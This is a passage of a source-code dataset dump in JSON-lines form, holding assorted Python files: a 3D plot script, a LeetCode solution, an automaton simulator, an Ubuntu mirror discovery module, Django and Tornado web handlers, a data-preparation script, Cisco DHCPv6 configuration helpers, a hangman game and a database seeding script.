\"{:.0f}\".format(x), np.arange(np.min(data[:, 2]), np.max(data[:, 2]), 1)), fontsize=10)\r\n\r\nax.set_yticks(np.arange(0.1, 1.05, 0.05))\r\nax.set_yticklabels(map(lambda x: 
\"{:.2f}\".format(x), np.arange(0.1, 1.05, 0.05)), fontsize=8)\r\n\r\nax.set_zticks(np.arange(0, np.max(data[:, 0]), 0.2))\r\nax.set_zticklabels(map(lambda x: \"{:.1f}\".format(x), np.arange(0, np.max(data[:, 0]), 0.2)), fontsize=10)\r\n\r\nax.view_init(50, -20)\r\n\r\nax.xaxis.labelpad=30\r\nax.yaxis.labelpad=30\r\n\r\nfig.colorbar(surf, ax=ax, shrink=0.5, aspect=5)\r\n\r\n\r\n\r\nplt.show()\r\n","sub_path":"3dchart.py","file_name":"3dchart.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452286987","text":"\"\"\"441. Arranging Coins\n\nYou have a total of n coins that you want to form in a staircase shape, where every k-th row must have exactly k coins.\n\nGiven n, find the total number of full staircase rows that can be formed.\n\nn is a non-negative integer and fits within the range of a 32-bit signed integer.\n\nExample 1:\n\nn = 5\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤\n\nBecause the 3rd row is incomplete, we return 2.\n\"\"\"\nclass Solution:\n def arrangeCoins(self, n: int) -> int:\n \"\"\"\n binary search res where\n (1+res)*res/2 <= n, 1<= res <= n\n \"\"\"\n if n < 1:\n return 0\n left, right = 1, n\n while left <= right:\n tmp = (left+right)//2\n cur = tmp * (tmp + 1)\n if cur == 2*n:\n return tmp\n elif cur > 2*n:\n right = tmp - 1\n else:\n left = tmp + 1\n return right\n\"\"\"\nalso see 35\n\"\"\"","sub_path":"leetcode_pop_q/441_Easy_Arranging_Coins.py","file_name":"441_Easy_Arranging_Coins.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302380392","text":"def remove_repetidos(lista): # Funcao que remove elementos repetidos do conjunto\n l = [] # gerados apos o processo de uniao\n for i in lista:\n if i not in l:\n l.append(i)\n return l\n \ndef e_fecho(estados):\n global regras\n\n efecho = []\n temp = estados\n\n for est in temp:\n efecho.append(est)\n for regra in regras:\n if regra[0] == est:\n if regra[1] == 'E':\n efecho = efecho + regra[2]\n for r in regra[2]: # for garante que nao vai ser comparado lista com string\n if r not in temp:\n temp.append(r)\n\n efecho = remove_repetidos(efecho)\n \n return efecho\n\ndef gera_ram(estado,entrada): \n global index\n global estAtual_2\n global flag\n global estFin\n global handler\n\n \n handler.write(\"Chegou em: \"+ estado+ \"\\n\")\n handler.write(\"e_fecho de:\"+ estado+ \" =\"+ str(e_fecho([estado]))+\"\\n\")\n\n estAtual_2 = estado\n for i in range(len(estFin)):\n if estFin[i] in e_fecho([estado]) and index == len(entrada):\n flag = 1\n handler.write(\"E - Estado alterado de \" + str(estado) + \" para \" + estFin[i]+ \"\\n\")\n return\n\n if index != len(entrada):\n \n for regra in regras:\n \n if entrada[index] == regra[1]:\n if estado == regra[0]:\n handler.write(str(entrada[index]) + \" - Estado alterado de \" + str(estado) + \" para \" + str(regra[2])+\"\\n\")\n\n estAtual = regra[2]\n \n for k in range(len(estAtual)):\n estAtual_2 = estAtual[k]\n index = index + 1\n gera_ram(estAtual_2,entrada)\n index = index - 1\n handler.write(\"\\nBacktrack\\n\")\n if regra[1] == 'E':\n if estado == regra[0]:\n handler.write(\"E - Estado alterado de \" + str(estado) + \" para \" + str(regra[2]))\n\n estAtual = regra[2]\n\n for k in range(len(estAtual)):\n estAtual_2 = estAtual[k]\n gera_ram(estAtual_2,entrada)\n handler.write(\"\\nBacktrack\\n\")\n\n elif estAtual_2 in estFin:\n flag = 1\n return\n \n\n\ndef 
afne(entrada):\n global handler\n global estFin\n global index\n global flag\n global regras\n\n handler = open(\"automato_ndetE.txt\",\"r\")\n \n linhas = handler.readlines()\n handler.close()\n\n alfabeto = []\n for elemento in linhas[0]:\n if elemento != '\\n':\n alfabeto.append(elemento)\n\n\n estados = linhas[1].split() # Leitura de dados\n\n estIni = linhas[2].split()\n\n estFin = linhas[3].split()\n\n qnt_regras = len(linhas) - 4\n\n regras = []\n for i in range(4,len(linhas)): # Do que foi lido no arquivo, aqui se pega as regras\n regras.append(linhas[i].split())\n\n for i in range(0,qnt_regras):\n aux = regras[i]\n aux2 = aux[2].split(\",\")\n del(aux[2])\n aux.append(aux2)\n regras[i] = aux\n\n\n handler = open(\"resultado.txt\",\"w\")\n \n handler.write(\"Alfabeto: \" + str(alfabeto) + \"\\n\" + \"Estados: \" +\n str(estados) + \"\\n\" + \"Estado Inicial: \" + str(estIni) + \"\\n\" + \n \"Estado(s) Final(is): \" + str(estFin) + \"\\n\" + \"\\nRegras: \" + \"\\n\")\n\n\n for i in range(0,qnt_regras):\n aux = regras[i]\n handler.write(str(i+1) + \") \" + \"(\" + str(aux[0]) + \",\" + str(aux[1]) + \") = \" + str(aux[2]) + \"\\n\")\n\n handler.write(\"\\n\")\n\n\n for i in range(0,len(entrada)): # Percorre os elementos do caso teste atual\n elemAtual = entrada[i]\n if elemAtual not in alfabeto:\n # Verifica se todos os elementos do caso atual \n # pertencem ao alfabeto\n \n handler.write(\"O caso teste possui elemento(s) que nao esta(o) no alfabeto!\")\n handler.close()\n exit()\n\n handler.write(entrada + \"\\n\")\n\n handler.write('\\n')\n \n index = 0\n flag = 0\n \n gera_ram(estIni[0],entrada)\n\n if flag == 0:\n handler.write(entrada+ \" -> Rejeitado pelo automato!\")\n elif flag == 1:\n handler.write(entrada+ \" -> Aceito pelo automato!\")\n\n\n handler.close()\n","sub_path":"LFA/Trabalho 1 e 2 Definitivo/AFNE.py","file_name":"AFNE.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616178874","text":"# Automated, robust apt-get mirror selection for Debian and Ubuntu.\n#\n# Author: Peter Odding \n# Last Change: June 10, 2017\n# URL: https://apt-mirror-updater.readthedocs.io\n\n\"\"\"Discovery of Ubuntu package archive mirrors.\"\"\"\n\n# Standard library modules.\nimport logging\n\n# External dependencies.\nfrom bs4 import BeautifulSoup\nfrom humanfriendly import Timer, format, pluralize\n\n# Modules included in our package.\nfrom apt_mirror_updater import CandidateMirror\nfrom apt_mirror_updater.http import fetch_url\n\nUBUNTU_MIRRORS_URL = 'https://launchpad.net/ubuntu/+archivemirrors'\n\"\"\"The URL of the HTML page listing official Ubuntu mirrors (a string).\"\"\"\n\nUBUNTU_SECURITY_URL = 'http://security.ubuntu.com/ubuntu'\n\"\"\"The URL where Ubuntu security updates are hosted (a string).\"\"\"\n\nUBUNTU_MIRROR_STATUSES = (\n ('Up to date', 0),\n ('One hour behind', 60 * 60),\n ('Two hours behind', 60 * 60 * 2),\n ('Four hours behind', 60 * 60 * 4),\n ('Six hours behind', 60 * 60 * 6),\n ('One day behind', 60 * 60 * 24),\n ('Two days behind', 60 * 60 * 24 * 2),\n ('One week behind', 60 * 60 * 24 * 7),\n ('Unknown', None),\n)\nr\"\"\"\nA tuple of tuples with Launchpad mirror statuses. Each tuple consists of two values:\n\n1. The human readable mirror latency (a string) as used on :data:`UBUNTU_MIRRORS_URL`.\n2. The mirror latency expressed in seconds (a number).\n\nThe 'known statuses' used by Launchpad were checked as follows:\n\n.. 
code-block:: sh\n\n $ curl -s https://launchpad.net/+icing/rev18391/combo.css | tr '{},.' '\\n' | grep distromirrorstatus\n distromirrorstatusUP\n distromirrorstatusONEHOURBEHIND\n distromirrorstatusTWOHOURSBEHIND\n distromirrorstatusFOURHOURSBEHIND\n distromirrorstatusSIXHOURSBEHIND\n distromirrorstatusONEDAYBEHIND\n distromirrorstatusTWODAYSBEHIND\n distromirrorstatusONEWEEKBEHIND\n distromirrorstatusUNKNOWN\n\"\"\"\n\nVALID_UBUNTU_COMPONENTS = 'main', 'restricted', 'universe', 'multiverse'\n\"\"\"A tuple of strings with the names of the components available in the Ubuntu package repositories.\"\"\"\n\nVALID_UBUNTU_SUITES = 'release', 'security', 'updates', 'backports', 'proposed'\n\"\"\"\nA tuple of strings with the names of the suites available in the Ubuntu package\nrepositories.\n\nThe actual name of the 'release' suite is the codename of the relevant Ubuntu\nrelease, while the names of the other suites are formed by concatenating the\ncodename with the suite name (separated by a dash).\n\nAs an example to make things more concrete, Ubuntu 16.04 has the following five\nsuites available: ``xenial`` (this is the release suite), ``xenial-security``,\n``xenial-updates``, ``xenial-backports`` and ``xenial-proposed``.\n\"\"\"\n\nDEFAULT_UBUNTU_SUITES = 'release', 'updates', 'backports', 'security'\n\"\"\"A tuple of strings with the Ubuntu suites that are enabled by default.\"\"\"\n\n# Initialize a logger for this program.\nlogger = logging.getLogger(__name__)\n\n\ndef discover_mirrors():\n \"\"\"\n Discover available Ubuntu mirrors by querying :data:`UBUNTU_MIRRORS_URL`.\n\n :returns: A set of :class:`.CandidateMirror` objects that have their\n :attr:`~.CandidateMirror.mirror_url` property set and may have\n the :attr:`~.CandidateMirror.last_updated` property set.\n :raises: If no mirrors are discovered an exception is raised.\n\n An example run:\n\n >>> from apt_mirror_updater.backends.ubuntu import discover_mirrors\n >>> from pprint import pprint\n >>> pprint(discover_mirrors())\n set([CandidateMirror(mirror_url='http://archive.ubuntu.com/ubuntu/'),\n CandidateMirror(mirror_url='http://ftp.nluug.nl/os/Linux/distr/ubuntu/'),\n CandidateMirror(mirror_url='http://ftp.snt.utwente.nl/pub/os/linux/ubuntu/'),\n CandidateMirror(mirror_url='http://ftp.tudelft.nl/archive.ubuntu.com/'),\n CandidateMirror(mirror_url='http://mirror.1000mbps.com/ubuntu/'),\n CandidateMirror(mirror_url='http://mirror.amsiohosting.net/archive.ubuntu.com/'),\n CandidateMirror(mirror_url='http://mirror.i3d.net/pub/ubuntu/'),\n CandidateMirror(mirror_url='http://mirror.nforce.com/pub/linux/ubuntu/'),\n CandidateMirror(mirror_url='http://mirror.nl.leaseweb.net/ubuntu/'),\n CandidateMirror(mirror_url='http://mirror.transip.net/ubuntu/ubuntu/'),\n ...])\n \"\"\"\n timer = Timer()\n mirrors = set()\n logger.info(\"Discovering available Ubuntu mirrors (using %s) ..\", UBUNTU_MIRRORS_URL)\n response = fetch_url(UBUNTU_MIRRORS_URL, retry=True)\n soup = BeautifulSoup(response, 'html.parser')\n for table in soup.findAll('table'):\n for tr in table.findAll('tr'):\n for a in tr.findAll('a', href=True):\n # Check if the link looks like a mirror URL.\n if (a['href'].startswith(('http://', 'https://')) and\n a['href'].endswith('/ubuntu/')):\n # Try to figure out the mirror's reported latency.\n last_updated = None\n text = u''.join(tr.findAll(text=True))\n for status_label, num_seconds in UBUNTU_MIRROR_STATUSES:\n if status_label in text:\n last_updated = num_seconds\n break\n # Add the mirror to our overview.\n 
mirrors.add(CandidateMirror(\n mirror_url=a['href'],\n last_updated=last_updated,\n ))\n # Skip to the next row.\n break\n if not mirrors:\n raise Exception(\"Failed to discover any Ubuntu mirrors! (using %s)\" % UBUNTU_MIRRORS_URL)\n logger.info(\"Discovered %s in %s.\", pluralize(len(mirrors), \"Ubuntu mirror\"), timer)\n return mirrors\n\n\ndef generate_sources_list(mirror_url, codename,\n suites=DEFAULT_UBUNTU_SUITES,\n components=VALID_UBUNTU_COMPONENTS,\n enable_sources=False):\n \"\"\"\n Generate the contents of ``/etc/apt/sources.list`` for an Ubuntu system.\n\n :param mirror_url: The base URL of the mirror (a string).\n :param codename: The codename of the Ubuntu release (a string like 'trusty' or 'xenial').\n :param suites: An iterable of strings (defaults to\n :data:`DEFAULT_UBUNTU_SUITES`, refer to\n :data:`VALID_UBUNTU_SUITES` for details).\n :param components: An iterable of strings (refer to\n :data:`VALID_UBUNTU_COMPONENTS` for details).\n :param enable_sources: :data:`True` to include ``deb-src`` entries,\n :data:`False` to omit them.\n :returns: The suggested contents of ``/etc/apt/sources.list`` (a string).\n \"\"\"\n lines = []\n directives = ('deb', 'deb-src') if enable_sources else ('deb',)\n for suite in suites:\n for directive in directives:\n lines.append(format(\n '{directive} {mirror} {suite} {components}', directive=directive,\n mirror=(UBUNTU_SECURITY_URL if suite == 'security' else mirror_url),\n suite=(codename if suite == 'release' else codename + '-' + suite),\n components=' '.join(components),\n ))\n return '\\n'.join(lines)\n","sub_path":"apt_mirror_updater/backends/ubuntu.py","file_name":"ubuntu.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311175398","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom . 
import store\n\n\ndef index(request):\n    return render(request, 'index.html')\n\n\ndef logout_request(request):\n    store.removeUser(request.session[\"user\"])\n    request.session[\"user\"] = None\n    return render(request=request,\n                  template_name=\"index.html\")\n\n\ndef login_request(request):\n    if request.method == 'POST':\n        username = request.POST.get('user_name')\n        if store.isUserPresent(username):\n            print(username + \" already present\")\n            return render(request,\n                          \"index.html\",\n                          {\"error\": True})\n        else:\n            print(username + \" is not present, inserting\")\n            store.addUser(username)\n            request.session[\"user\"] = username\n            return render(request,\n                          \"home.html\",\n                          {\"user\": username})\n","sub_path":"Calculations/CalcAssessment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"413972635","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n__author__ = \"BIGNI\"\n__date__ = \"2017/4/29 16:34\"\nimport traceback\n\nfrom django.views.generic import View\n\nfrom .models import Host\n\n\nclass ClientHandler(View):\n    # initialization\n    def __init__(self, client_id):\n        self.client_id = client_id\n        # client configuration\n        self.client_configs = {\n            \"services\": {}\n        }\n\n    def fetch_configs(self):\n\n        try:\n\n            host_obj_id = Host.objects.get(id=self.client_id)\n            print(\">>>>>>>>>\", host_obj_id)\n            # fetch the list of templates\n            template_list = list(host_obj_id.templates.select_related())\n            print(\">>>>\", template_list)\n            # fetch the host-group objects\n\n            # host_group_obj = host_obj_id.host_groups.select_related()\n            # add the templates that belong to each host group\n            for host_group in host_obj_id.host_groups.select_related():\n                template_list.extend(host_group.templates.select_related())\n            print(\"--->\", template_list)\n            # fetch the list of services\n            for template in template_list:\n                for service in template.services.select_related():\n                    print(service)\n                    # fetch the plugin name and the check interval\n                    self.client_configs['services'][service.name] = [service.plugin_name, service.interval]\n\n        except:\n            traceback.print_exc()\n        return self.client_configs\n\n","sub_path":"apps/monitor/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"143755518","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 12 00:15:49 2019\n\n@author: dusty\n\nDustin Burnham\nData Science 400\n2/12/2019\nMilestone Project 2: Data Preparation\n\"\"\"\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 1. Read in the data from a freely available source on the internet. \nurl = 'https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data'\nnames = ['age', 'workclass', 'fnlwgt', 'education', 'education-num', 'marital-status',\n         'occupation', 'relationship', 'race', 'sex', 'capital-gain', 'capital-loss',\n         'hours-per-week', 'native-country', 'income']\n\ncensus = pd.read_csv(url, header=None)\n\n# Assign names\ncensus.columns = names\n\n# 2. Account for outlier values in numeric columns (at least 1 column).\n# Replace outliers for age with the median.\ndef replace_outliers(df, col):\n    \"\"\"\n    Input: dataframe, column name\n    Output: dataframe where the outliers have been replaced by the median of\n    that column.\n    \n    I will check which values fall within +- 2 standard deviations of the\n    mean; I will use the tilde (~) to pick out the outliers and replace them\n    with the median.\n    \"\"\"\n    \n    high = np.mean(df[col]) + 2 * np.std(df[col])\n    low = np.mean(df[col]) - 2 * np.std(df[col])\n    FlagGood = (df.loc[:, col] < high) & (df.loc[:, col] > low)\n    df.loc[~FlagGood, col] = np.median(df[col])\n    return df\n    \ncensus = replace_outliers(census, \"age\")\n\n# 3. Replace missing numeric data (at least 1 column).\n# Replace missing numeric data from the hours-per-week attribute\n# with the median hours worked per week.\ndef replace_median(df, col):\n    \"\"\"\n    Input: dataframe, column where values will be replaced.\n    Output: dataframe with median values replacing the missing values.\n    \n    First we coerce the column to numeric, where all parse errors\n    are replaced with NaN. Next we find the missing values using the\n    np.isnan() function, which returns a boolean array that picks out those values.\n    Finally we replace those NaNs with the median of the non-missing entries.\n    \"\"\"\n    df.loc[:, col] = pd.to_numeric(df.loc[:, col], errors='coerce')\n    HasNan = np.isnan(df.loc[:, col])\n    df.loc[HasNan, col] = np.nanmedian(df.loc[:, col])\n    return df\n    \ncensus = replace_median(census, \"hours-per-week\")\n\n# After replacing missing numerical values in hours-per-week, I will remove the \n# remaining \"?\" values by replacing them with NaN and then using the dropna\n# function to remove all rows with any NaN.\ncensus = census.replace(\" ?\", float(\"nan\"))\ncensus = census.dropna(axis=0)\n\n# 4. Normalize numeric values (at least 1 column, but be consistent with numeric data).\n# I will normalize the age and hours column for plotting on a histogram.\n# All values will be between 0 and 1.\ndef MinMaxNorm(df, col):\n    \"\"\"\n    Input: dataframe name, column name\n    Output: array of normalized values using the (x - min(x)) / (max(x) - min(x))\n    formula to feature scale the column.\n    \"\"\"\n    \n    col_tmp = df.loc[:, col]\n    MinMax = (col_tmp - min(col_tmp)) / (max(col_tmp) - min(col_tmp))\n    return MinMax\n    \nMinMaxAge = MinMaxNorm(census, 'age')\nMinMaxHours = MinMaxNorm(census, 'hours-per-week')\n\ncensus.loc[:, \"min-max-age\"] = MinMaxAge\ncensus.loc[:, \"min-max-hours\"] = MinMaxHours\n\n#plt.hist(MinMaxAge)\n#plt.hist(MinMaxHours)\n\n# 5. Bin numeric variables (at least 1 column).\n# I will bin age into young, middle-aged, and senior buckets. This\n# will turn numerical data into categorical data. Column will be replaced.\nage = census.loc[:, 'age']\n\n# Determine boundaries\nbins = 3\nBinWidth = (max(age) - min(age)) / bins\nMinBin1 = float('-inf')\nMaxBin1 = min(age) + BinWidth\nMaxBin2 = min(age) + 2 * BinWidth\nMaxBin3 = float('inf')\n\n# Assign values to new bins. Replace former age column with new values.\neqBinnedAge = np.empty(len(age), object)\neqBinnedAge[(MinBin1 < age) & (age <= MaxBin1)] = \"young\"\neqBinnedAge[(MaxBin1 < age) & (age <= MaxBin2)] = \"middle-aged\"\neqBinnedAge[(MaxBin2 < age) & (age <= MaxBin3)] = \"senior\"\n\ncensus.loc[:, 'age'] = eqBinnedAge\n\n# 6. Consolidate categorical data (at least 1 column).\n# Consolidate marital-status into married or not married.\nmarried = census.loc[:, 'marital-status']\nMarriedOrNot = np.empty(len(married), object)\nMarriedOrNot[married == \" Married-civ-spouse\"] = 'Married'\nMarriedOrNot[married != \" Married-civ-spouse\"] = 'Not Married'\ncensus.loc[:, 'marital-status'] = MarriedOrNot\n\n# 7. 
One-hot encode categorical data with at least 3 categories (at least 1 column).\n# One hot encode the race categorical variable, giving each race its own\n# attribute of 1s and 0s for analsis.\ncensus.loc[:, \"White\"] = (census.loc[:, \"race\"] == \" White\").astype(int)\ncensus.loc[:, \"Black\"] = (census.loc[:, \"race\"] == \" Black\").astype(int)\ncensus.loc[:, \"Asian-Pac-Islander\"] = (census.loc[:, \"race\"] == \" Asian-Pac-Islander\").astype(int)\ncensus.loc[:, \"Amer-Indian-Eskimo\"] = (census.loc[:, \"race\"] == \" Amer-Indian-Eskimo\").astype(int)\ncensus.loc[:, \"Other\"] = (census.loc[:, \"race\"] == \" Other\").astype(int)\n\n# 8. Remove obsolete columns (race). Other columns like marital status and\n# age were overwritten.\ncensus = census.drop(\"race\", axis=1)\n\n# Return the new dataframe as a csv in the current working directory\n# with the following filename.\nfilename = 'DustinBurnham-M02-Dataset.csv'\ncensus.to_csv(filename)","sub_path":"DustinBurnham-M02-Script.py","file_name":"DustinBurnham-M02-Script.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404551866","text":"\"\"\"Common configure functions for dhcpv6\"\"\"\r\n\r\n# Python\r\nimport logging\r\n\r\n# Unicon\r\nfrom unicon.core.errors import SubCommandFailure\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\ndef create_dhcp_pool_ipv6(device, pool_name, ipv6_prefix, lifetime, pref_lifetime):\r\n \"\"\" Create DHCP IPv6 pool\r\n Args:\r\n device ('obj'): device to use\r\n pool_name ('str'): name of the pool to be created\r\n ipv6_prefix ('str'): IPv6 prefix\r\n lifetime ('int'): lifetime in seconds\r\n pref_lifetime ('int'): preferred lifetime in seconds\r\n Returns:\r\n None\r\n Raises:\r\n SubCommandFailure: Failed creating IPv6 DHCP pool\r\n \"\"\"\r\n log.info(\r\n \"Configuring IPv6 DHCP pool with name={pool_name}, ipv6_prefix={ipv6_prefix}, lifetime={lifetime}, and \"\r\n \"Preferred Lifetime {pref_lifetime} \".format(pool_name=pool_name, ipv6_prefix=ipv6_prefix, lifetime=lifetime, pref_lifetime=pref_lifetime)\r\n )\r\n\r\n try:\r\n device.configure(\r\n [\r\n \"ipv6 dhcp pool {pool_name}\".format(pool_name=pool_name),\r\n\t \"address prefix {ipv6_prefix} lifetime {lifetime} {pref_lifetime}\".format(ipv6_prefix=ipv6_prefix, lifetime=lifetime, pref_lifetime=pref_lifetime)\r\n ]\r\n )\r\n\r\n except SubCommandFailure:\r\n raise SubCommandFailure(\r\n \"Could not configure IPv6 DHCP pool {pool_name}\".format(\r\n pool_name=pool_name\r\n )\r\n )\r\n\r\ndef remove_dhcp_pool_ipv6(device, pool_name):\r\n \"\"\" Remove DHCP IPv6 pool\r\n Args:\r\n device ('obj'): device to use\r\n pool_name ('str'): name of the pool to be created\r\n Returns:\r\n None\r\n Raises:\r\n SubCommandFailure: Failed removing IPv6 DHCP pool\r\n \"\"\"\r\n log.info(\r\n \"Removing IPv6 DHCP pool with name={pool_name}\".format(pool_name=pool_name)\r\n )\r\n\r\n try:\r\n device.configure(\r\n [\r\n \"no ipv6 dhcp pool {pool_name}\".format(pool_name=pool_name),\r\n ]\r\n )\r\n\r\n except SubCommandFailure:\r\n raise SubCommandFailure(\r\n \"Could not remove IPv6 DHCP pool {pool_name}\".format(\r\n pool_name=pool_name\r\n )\r\n )\r\n\r\n\r\n","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dhcpv6/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313617666","text":"from .exceptions import *\nimport 
random\n\nclass GuessAttempt(object):\n def __init__(self, letter, hit=None, miss=None):\n self.letter = letter\n self.hit = hit\n self.miss = miss\n if self.hit and self.miss:\n raise InvalidGuessAttempt()\n \n def is_hit(self):\n if self.hit:\n return self.hit\n return False\n\n def is_miss(self):\n if self.miss:\n return self.miss\n return False\n \n \n \nclass GuessWord(object):\n def __init__(self, word):\n self.answer = word\n self.masked = '*' * len(word)\n\n if not word:\n raise InvalidWordException()\n \n def uncover_word(self, guess):\n \n masked_list = list(self.masked)\n index_to_switch = []\n masked_string = self.masked\n answer_lower = self.answer.lower()\n if guess in answer_lower:\n for ind, letter in enumerate(answer_lower):\n if guess == letter:\n index_to_switch.append(ind)\n for item in index_to_switch:\n masked_list[item] = guess\n masked_string = ''.join(masked_list)\n \n return masked_string\n \n def perform_attempt(self, guess):\n guess = guess.lower()\n if len(guess) > 1:\n raise InvalidGuessedLetterException()\n \n if guess in self.answer.lower():\n hit_or_miss = GuessAttempt(guess, hit = True)\n self.masked = self.uncover_word(guess)\n else:\n hit_or_miss = GuessAttempt(guess, miss = True)\n return hit_or_miss\n \n\n \n \n \nclass HangmanGame(object):\n WORD_LIST = ['rmotr', 'python', 'awesome']\n \n def __init__(self, words = None, number_of_guesses = 5):\n \n if words == None:\n words = self.WORD_LIST\n \n self.remaining_misses = number_of_guesses\n random_word = self.select_random_word(words)\n self.word = GuessWord(random_word)\n self.previous_guesses = []\n \n def is_won(self):\n return self.word.masked == self.word.answer\n\n def is_lost(self):\n return self.remaining_misses == 0\n\n def is_finished(self):\n return self.is_won() or self.is_lost()\n\n def guess(self, letter):\n letter = letter.lower()\n if letter in self.previous_guesses:\n raise InvalidGuessedLetterException()\n if self.is_finished():\n raise GameFinishedException()\n \n self.previous_guesses.append(letter.lower())\n guess_attempt = self.word.perform_attempt(letter)\n \n if guess_attempt.is_miss():\n self.remaining_misses -= 1\n \n if self.is_won():\n raise GameWonException()\n\n if self.is_lost():\n raise GameLostException()\n\n return guess_attempt\n \n\n \n\n @classmethod\n def select_random_word(cls, list):\n if not list:\n raise InvalidListOfWordsException()\n return random.choice(list)\n \n \n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334326042","text":"#!/bin/python\n\n# Services exposed by the VM Manager\n# The REST url :\n# http://host-name/api/1.0/disk-usage\n# http://host-name/api/1.0/running-time\n# http://host-name/api/1.0/mem-usage\n# http://host-name/api/1.0/running-processes\n# http://host-name/api/1.0/cpu-load\n# http://host-name/api/1.0/execute/\n\nimport urlparse\nimport os\nimport os.path\nimport json\nimport requests\n\n# tornado imports\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nfrom tornado.options import define, options\n\n# ADS imports\nfrom __init__ import *\nfrom httplogging.http_logger import logger\nfrom utils.envsetup import EnvSetUp\nfrom controller import Controller\nfrom config import authorized_users\n\n\ndefine(\"port\", default=8000, help=\"run on the given port\", type=int)\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n def 
get_current_user(self):\n return self.get_secure_cookie(\"user\")\n\n\nclass MainHandler(BaseHandler):\n \"\"\"\n Main Handler is to handle the index page for ControllerServer\n \"\"\"\n def get(self):\n if not self.current_user:\n self.redirect('/login')\n else:\n self.render('index.html')\n\n def post(self):\n if not self.current_user:\n self.redirect('/login')\n return\n\n post_data = dict(urlparse.parse_qsl(self.request.body))\n c = Controller()\n # log the user who is deploying the lab..\n logger.debug(\"Lab Deployment: deployed by: %s, lab id: %s, URL: %s\" %\n (self.current_user,\n post_data['lab_id'],\n post_data['lab_src_url']))\n\n self.write(c.test_lab(self.current_user, post_data['lab_id'],\n post_data['lab_src_url'],\n post_data.get('version', None)))\n\n\nclass LoginHandler(BaseHandler):\n \"\"\"\n LoginHandler will handle logins at /login\n \"\"\"\n\n def get(self):\n self.render('login.html')\n\n def post(self):\n msg = \"LoginHandler: Authenticating and authorizing using Persona..\"\n logger.debug(msg)\n assertion = self.get_argument(\"assertion\")\n\n if not assertion:\n logger.debug(\"Assertion not passed by the client. Aborting.\")\n self.write_error(400)\n return\n\n data = {'assertion': assertion,\n 'audience': config_spec[\"CONTROLLER_CONFIG\"][\"APP_URL\"]}\n\n # make the auth request to persona\n resp = requests.post(\n config_spec[\"CONTROLLER_CONFIG\"][\"PERSONA_VERIFIER\"],\n data=data, verify=True)\n\n if not resp.ok:\n logger.debug(\"Response from Persona is malformed. Aborting auth.\")\n self.write_error(500)\n return\n\n verified_data = json.loads(resp.content)\n logger.debug(\"Verified data from Persona: %s\" % verified_data)\n\n if verified_data['status'] != 'okay':\n logger.debug(\"Persona returned error. Aborting authentication.\")\n self.write_error(500)\n return\n\n user_email = verified_data['email']\n # user exists in our set of authorized users\n if user_email in authorized_users.users:\n logger.debug(\"Authentication and authorization successful!\")\n self.set_secure_cookie('user', user_email)\n self.write({'status': 'okay', 'msg': \"Successful login\"})\n # user does not exist. Send unauthorized error.\n else:\n logger.debug(\"User: %s is not authorized. Aborting.\" % user_email)\n msg = \"Oops! You are not authorized to deploy a lab.
    \"\n msg += \"Please contact admin for details.\"\n self.write({'status': 'error', 'msg': msg})\n\n\nclass LogoutHandler(BaseHandler):\n \"\"\"\n LogoutHandler will handle logouts at /logout\n \"\"\"\n\n def post(self):\n self.clear_cookie('user')\n self.write({'status': 'okay', 'msg': 'logged out'})\n\n\nif __name__ == \"__main__\":\n env = EnvSetUp.Instance()\n config_spec = env.get_config_spec()\n tornado.options.parse_command_line()\n app = tornado.web.Application(\n handlers=[\n (r\"/\", MainHandler),\n (r\"/login\", LoginHandler),\n (r\"/logout\", LogoutHandler)\n ],\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n cookie_secret=config_spec[\"CONTROLLER_CONFIG\"][\"COOKIE_SECRET\"],\n debug=True)\n\n http_server = tornado.httpserver.HTTPServer(app)\n options.port = config_spec[\"CONTROLLER_CONFIG\"][\"SERVER_PORT\"]\n logger.debug(\"ControllerServer: It will run on port : \" + str(options.port))\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"src/controller_server.py","file_name":"controller_server.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230137235","text":"import itertools\nfrom random import randint, choice\n\nfrom sqlalchemy.orm import sessionmaker\n\nfrom mapper.mapper import User, Event, RawData, Processing, engine\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nif session.query(RawData).first():\n print('Test data already generated')\n quit()\n\n\nprint('Creating Users & Events')\nfor n in range(1000):\n session.add(User())\n session.add(Event())\nsession.commit()\nprint('1000 User & Event 